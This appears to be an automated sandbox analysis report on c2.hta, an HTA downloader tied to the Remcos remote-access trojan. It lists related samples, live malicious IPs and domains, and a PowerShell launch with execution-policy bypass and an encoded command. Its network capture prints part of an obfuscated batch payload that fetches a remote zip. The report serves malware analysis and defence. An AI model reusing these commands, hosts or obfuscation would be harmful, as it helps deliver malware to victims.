EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 7
• Number of non-executed functions: 8
Cookbook Comments:
• Found application associated with file extension: .hta
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:36:13 | API Interceptor | 1x Sleep call for process: mshta.exe modified
09:36:14 | API Interceptor | 14x Sleep call for process: powershell.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                193.26.115.39c.htaGet hashmaliciousRemcosBrowse
                                  c1.htaGet hashmaliciousUnknownBrowse
                                    c2.htaGet hashmaliciousRemcosBrowse
                                      c2.htaGet hashmaliciousRemcosBrowse
                                        c2.htaGet hashmaliciousRemcosBrowse
                                          c2.htaGet hashmaliciousRemcosBrowse
                                            RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              c2.htaGet hashmaliciousRemcosBrowse
                                                9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    candwfarmsllc.comc1.htaGet hashmaliciousUnknownBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                    • 193.26.115.39
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
QUICKPACKETUS | c.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
QUICKPACKETUS | c1.hta | Get hash | malicious | Unknown | Browse | 193.26.115.39
QUICKPACKETUS | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
QUICKPACKETUS | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
QUICKPACKETUS | RFQ-20241230.pif.exe | Get hash | malicious | Remcos | Browse | 173.211.106.233
QUICKPACKETUS | Suppliers_Data.pif.exe | Get hash | malicious | Remcos | Browse | 173.211.106.233
QUICKPACKETUS | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
QUICKPACKETUS | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
QUICKPACKETUS | RailProvides_nopump.exe | Get hash | malicious | Remcos | Browse | 193.26.115.39
QUICKPACKETUS | c2.hta | Get hash | malicious | Remcos | Browse | 193.26.115.39
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | E6wUHnV51P.exe | Get hash | malicious | DCRat | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | resembleC2.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | c1.hta | Get hash | malicious | Unknown | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | http://www.grhga.icu/ | Get hash | malicious | Unknown | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | http://keystonerelated.pages.dev/ | Get hash | malicious | HTMLPhisher | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | https://telegrams-mc.org/ | Get hash | malicious | Unknown | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | http://metamaeskloegin.webflow.io/ | Get hash | malicious | HTMLPhisher | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | http://www.www-support-com.info/fmicode/code.php | Get hash | malicious | Unknown | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | http://m.escritoresunidos.com/ | Get hash | malicious | Unknown | Browse | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | https://terrific-metal-countess.glitch.me/ | Get hash | malicious | HTMLPhisher | Browse | 193.26.115.39
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1336
                                                    Entropy (8bit):5.415351548465897
                                                    Encrypted:false
                                                    SSDEEP:24:3xSWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8er8Hw/1TAn:oWSU4y4RQmFoUeWmfmZ9tK8NWR8ej/1Q
                                                    MD5:0649CF090C1FB666FA16D57DA3D07ACA
                                                    SHA1:A6BB533D587F5B9D82313DE3768E681AE8EF5E9B
                                                    SHA-256:67E20113262E61CFDE9B4286D61D8E62016FA1479FAC7795B69012DADCD21456
                                                    SHA-512:DE44C12F8BE50C06692E528019F5ABB0E4B0228E7A1D9A50EFC4505D727C09A56BDAF696DAE4A77FDAB79EB76C54DC18723239567BB084DB8223C5AC1779C6EE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    File type:HTML document, ASCII text, with CRLF line terminators
                                                    Entropy (8bit):4.152153947297235
                                                    TrID:
                                                    • HyperText Markup Language (12001/1) 40.67%
                                                    • HyperText Markup Language (11501/1) 38.98%
                                                    • HyperText Markup Language (6006/1) 20.35%
                                                    File name:c2.hta
                                                    File size:3'459 bytes
                                                    MD5:18f2197e51378d2fc3f6d250aca9a459
                                                    SHA1:b58941e542d1c4ec72c3ca925794e1de9c5d0338
                                                    SHA256:525d22cf62c199246896579367e361fae0dc4e80ad76076965546f7647a9c491
                                                    SHA512:686f4083069ef4491846befd53b411ec4c0f7ce7756d0f20ccb716f75ad7d6c9a380622437865f7a57c992b6b574c0f622bcb7ac2a2fb3a0acbd6cb6b38fc7af
                                                    SSDEEP:48:GOhhqnDjVJ9EAJtQWFUR/CZNOiPiZvJklJNA/kjw2Z4DhEHP//w/CO:GkqnDjVJ9DJpZ0aiZvqQk02Z4m//S
                                                    TLSH:79619522E9AEBD94473973300809699AE387171353615B08FCDF240FEF78610E34AA9C
                                                    File Content Preview:<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="app".. APPLICATIONNAME="Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. SHOWINTASKBAR="no"..
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-12T15:36:16.173975+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.4 | 49732 | 193.26.115.39 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 15:36:15.489094019 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:15.489130974 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:15.489212036 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:15.495939970 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:15.495959997 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.024626017 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.024760008 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:16.029479027 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:16.029486895 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.029783964 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.050846100 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:16.091336966 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.174067020 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.174118042 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.174211979 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:16.174221992 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.174253941 CET | 443 | 49732 | 193.26.115.39 | 192.168.2.4
Jan 12, 2025 15:36:16.174273968 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:16.174304008 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Jan 12, 2025 15:36:16.182676077 CET | 49732 | 443 | 192.168.2.4 | 193.26.115.39
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 12, 2025 15:36:15.448225021 CET | 65414 | 53 | 192.168.2.4 | 1.1.1.1
Jan 12, 2025 15:36:15.483144999 CET | 53 | 65414 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 15:36:15.448225021 CET | 192.168.2.4 | 1.1.1.1 | 0xc2dc | Standard query (0) | candwfarmsllc.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 15:36:15.483144999 CET | 1.1.1.1 | 192.168.2.4 | 0xc2dc | No error (0) | candwfarmsllc.com | | 193.26.115.39 | A (IP address) | IN (0x0001) | false
                                                    • candwfarmsllc.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 193.26.115.39 | 443 | 5064 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 14:36:16 UTC | 168 | OUT | GET /c2.bat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: candwfarmsllc.com
Connection: Keep-Alive
2025-01-12 14:36:16 UTC | 288 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 14:36:16 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 07 Jan 2025 14:48:52 GMT
ETag: "e32-62b1ed7f84eca"
Accept-Ranges: bytes
Content-Length: 3634
Connection: close
Content-Type: application/x-msdownload
2025-01-12 14:36:16 UTC | 3634 | IN | Data Raw: 40 25 56 4c 75 78 44 78 42 4d 25 65 25 7a 6b 6e 68 74 72 74 69 25 63 25 71 58 49 65 25 68 25 44 69 6f 55 70 72 62 25 6f 25 6e 46 25 20 25 58 53 7a 70 4a 75 4a 25 6f 25 5a 25 66 25 64 4c 25 66 25 65 45 4d 42 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 4f 66 52 5a 68 25 65 25 62 7a 68 6b 72 75 53 59 25 74 25 44 6b 75 74 4b 64 25 20 25 64 78 44 48 25 75 25 4b 7a 47 25 72 25 4b 47 75 57 67 70 42 6d 4d 6f 25 6c 25 61 64 71 50 68 42 77 52 25 3d 25 59 4e 4d 6a 6d 25 68 25 72 74 52 4c 74 50 4a 65 52 25 74 25 44 53 66 57 7a 53 25 74 25 79 59 79 25 70 25 41 42 54 4d 57 58 75 41 73 25 73 25 6d 25 3a 25 4d 49 25 2f 25 53 6e 42 6c 25 2f 25 74 74 6d 25 6d 25 67 76 74 25 79 25
Data Ascii: @%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%set url=https://myguyapp.com/msword.zips%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%

                                                    Target ID:0
                                                    Start time:09:36:13
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                    Imagebase:0x700000
                                                    File size:13'312 bytes
                                                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:09:36:13
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand 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
                                                    Imagebase:0x9c0000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:36:13
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:26.3%
                                                      Total number of Nodes:19
                                                      Total number of Limit Nodes:0
[execution_graph: node/edge rendering data omitted. Root nodes 47aa4f8 and 47aa480; CreateProcessW is reached at 47aa3ec, 47ab9f8 and 47aaef6]

                                                      Control-flow Graph

[control_flow_graph for code at 47aaf28-47ab625: basic-block edge list omitted. Calls: 47aa3d4, 47aa3ec, 47aa3e0, 47aa3f8, 47abdc8, 47abdb8]
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4L^q$4L^q$4L^q
                                                      • API String ID: 0-1735365799
                                                      • Opcode ID: 1645a05be7df280b59c659d41662e607db7e6b0c7678bb817e33c185222e18ef
                                                      • Instruction ID: 375e366dde0c1e7a121b309be570cb069714cccfa532cd32c9b19cae397412df
                                                      • Opcode Fuzzy Hash: 1645a05be7df280b59c659d41662e607db7e6b0c7678bb817e33c185222e18ef
                                                      • Instruction Fuzzy Hash: F5127C70A002088FDB18DFA5C494BADBBF2FF88304F148569E50A9B3A5DB75AC55CF91

                                                      Control-flow Graph

[control_flow_graph for code at 47ab9ed-47abd7c: basic-block edge list omitted. CreateProcessW at 47abc50-47abca5; call 47a04ec]
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d18c6b6501329056639af41538b84521645bcdec24a4ae607b594b3a8770ab7a
                                                      • Instruction ID: 235ffdcf0895bfd7d3655b6f5481c33bd1bffce0bd4b3525a3f7dee0a7d40c43
                                                      • Opcode Fuzzy Hash: d18c6b6501329056639af41538b84521645bcdec24a4ae607b594b3a8770ab7a
                                                      • Instruction Fuzzy Hash: C7C11571D00219DFDB24CFA9C884B9DBBB2BF88314F25822AE505A7351DB74A995CF81

                                                      Control-flow Graph

[control_flow_graph for code at 47aa3ec-47abd7c: basic-block edge list omitted. CreateProcessW at 47abc50-47abca5; call 47a04ec]
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000004), ref: 047ABC95
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 4396a0a071d5a8c08e5f7191d97d815a60e1d0f7e71aed44db27234faec3dba6
                                                      • Instruction ID: d9ba42c1ad3b0b56f35034472f66a837dc26b4bf041ea243a3e16413a0a8f6fe
                                                      • Opcode Fuzzy Hash: 4396a0a071d5a8c08e5f7191d97d815a60e1d0f7e71aed44db27234faec3dba6
                                                      • Instruction Fuzzy Hash: 9DC12671D00219DFDB24CFA9C884B9DBBF2BF88314F25822AE505A7350DB74A995CF91

                                                      Control-flow Graph
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: ccc61cff6ecf43aa61e15eb0270e0d5aa9e018c9bba53722396040d7e19cd64c
                                                      • Instruction ID: da47f2d10abf332e0a1f336abf83ff9098d110af5ee71feaebba9b777d99da7c
                                                      • Opcode Fuzzy Hash: ccc61cff6ecf43aa61e15eb0270e0d5aa9e018c9bba53722396040d7e19cd64c
                                                      • Instruction Fuzzy Hash: 01124AB17043598FCB189B78981876BBBA5AFD3310F5480BADA06CF391DB32C945C7A1

                                                      Control-flow Graph
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15899c98005d43064dc98b916e22c0e05fec8bdb077acffa206dd14c2c5bfe51
                                                      • Instruction ID: de9031b704ea90d3f46ba8882ceac02b43da02f9622449dcc7974be9d723ba0e
                                                      • Opcode Fuzzy Hash: 15899c98005d43064dc98b916e22c0e05fec8bdb077acffa206dd14c2c5bfe51
                                                      • Instruction Fuzzy Hash: 8A412BF0A0430ADFCB188F74855576A7BB1AF83794B9480A6C902DF792EB31D945C7A1

                                                      Control-flow Graph
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724486253.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_2e9d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28a5d485968d821e7b08f1a72842e01abe73bd6de7579d7dd611b16ede02266a
                                                      • Instruction ID: 398d34a76cd9a08beadb84e34f37561706fc44882397d8a12ade3de1e9039de4
                                                      • Opcode Fuzzy Hash: 28a5d485968d821e7b08f1a72842e01abe73bd6de7579d7dd611b16ede02266a
                                                      • Instruction Fuzzy Hash: 97012D7100E3C09FD7128B258C94762BFB4DF43228F19C1DBD9888F1A7C2699849C772

                                                      Control-flow Graph
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724486253.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_2e9d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: febea24c6c37a86221bd05a685ad500136ae6265d8d93472e1c787d42e143642
                                                      • Instruction ID: ebf0dccaf8a5fde6fa6df8697e453c79a28f3c9ff3b8a0f4d48019a9fe90bc21
                                                      • Opcode Fuzzy Hash: febea24c6c37a86221bd05a685ad500136ae6265d8d93472e1c787d42e143642
                                                      • Instruction Fuzzy Hash: 1B0126310493109AEB10AF29CD84BA7FF98EF41328F18C52BED084B286C379D845C6B1
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9ec0be41cd7e04d7e8f72906b7e823e8d8fd34dd3876582b0854207faa657dff
                                                      • Instruction ID: c06b29f36791f1859dadebaaa0513014dd477b6fcdf9b2ee51a9130196d6ff07
                                                      • Opcode Fuzzy Hash: 9ec0be41cd7e04d7e8f72906b7e823e8d8fd34dd3876582b0854207faa657dff
                                                      • Instruction Fuzzy Hash: 0A41D46294F7D02EC703AF385E320927F709F5311530A09DBD4C2CA6B7E499A91CC7A6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb992aeb0f9cd01e02a14ac253f03492b8dcc054faba69aced609db6678e62d6
                                                      • Instruction ID: 599a237aad2d314e294c5eceee380d965250541373f0d981d17d6200ee52d090
                                                      • Opcode Fuzzy Hash: bb992aeb0f9cd01e02a14ac253f03492b8dcc054faba69aced609db6678e62d6
                                                      • Instruction Fuzzy Hash: FF31E6A290E3C54FD3539E2888652C27F71DF63144F0A82DBC4C1CB5A7E9295A1BC366
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1724999516.00000000047A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_47a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a19ca78a1c9678a1ea223df4080b51647b33fb3bc4af5088371486fe66755bf
                                                      • Instruction ID: 95e1925a74c7292aa703dc3c0f43c1467ac37c58cd23b04a54586d76696236c2
                                                      • Opcode Fuzzy Hash: 9a19ca78a1c9678a1ea223df4080b51647b33fb3bc4af5088371486fe66755bf
                                                      • Instruction Fuzzy Hash: 3F21B96285EBE05FD707AB3899797957FA09F13608F0B41D7C0D48F0B7A798844CC6AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (Xcq$(Xcq$4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-3664762724
                                                      • Opcode ID: 6f83f4b26c5bbe487a100a9ce5e7ee36795c6524efa5d0fced42ef6748a4e1fd
                                                      • Instruction ID: fda8b112ef2ac8ef168f99004692588f911fa19a19bf0e77caef8af7f80b17f3
                                                      • Opcode Fuzzy Hash: 6f83f4b26c5bbe487a100a9ce5e7ee36795c6524efa5d0fced42ef6748a4e1fd
                                                      • Instruction Fuzzy Hash: D38104F1B042968FCB159B7994182ABBFF69FD2210F24846BD406CB355DE32CA86C791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-1608119003
                                                      • Opcode ID: ca3be5cda759623e4ccbca1a73a3fce4b94140ea61717b0e16ac09238ba7ac21
                                                      • Instruction ID: 32abd7a384fd4d938f1b8951800003e512999c47c29f93aadc3a33a0436da8a9
                                                      • Opcode Fuzzy Hash: ca3be5cda759623e4ccbca1a73a3fce4b94140ea61717b0e16ac09238ba7ac21
                                                      • Instruction Fuzzy Hash: C5F137B1B0421ACFCB189B78D41866ABBE6AFD6310F54807BD947CB351EB32C946C791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-1608119003
                                                      • Opcode ID: 9d0ea16b07a07c4ecb8a8a8b54238e944c8c0eecd5c3ec0c19d9ebaddb9fff29
                                                      • Instruction ID: 7426020a8ebd515e106dffba881c286aacc8576f3881bef20ae1f2fe82a478cc
                                                      • Opcode Fuzzy Hash: 9d0ea16b07a07c4ecb8a8a8b54238e944c8c0eecd5c3ec0c19d9ebaddb9fff29
                                                      • Instruction Fuzzy Hash: 1FE169B1B04346CFCB158B799418A6ABFE5AFC6210F5484BBD546CB392DA31CC4AC7A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1730442639.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q$$^q$$^q
                                                      • API String ID: 0-2125118731
                                                      • Opcode ID: 23f0d74346e89bb287059454907428d0c3b1faada259280e14ac5824e5eb5c15
                                                      • Instruction ID: 0fe212f75445cd92a0e7a0d71fb2c3dbfeea3b075ac5f896887cba8afda30399
                                                      • Opcode Fuzzy Hash: 23f0d74346e89bb287059454907428d0c3b1faada259280e14ac5824e5eb5c15
                                                      • Instruction Fuzzy Hash: 9A2129B171430AABDB246A7B9C08B27AAD69BC1714FA4843AE507CB385DD36C8498361
                                                      Strings
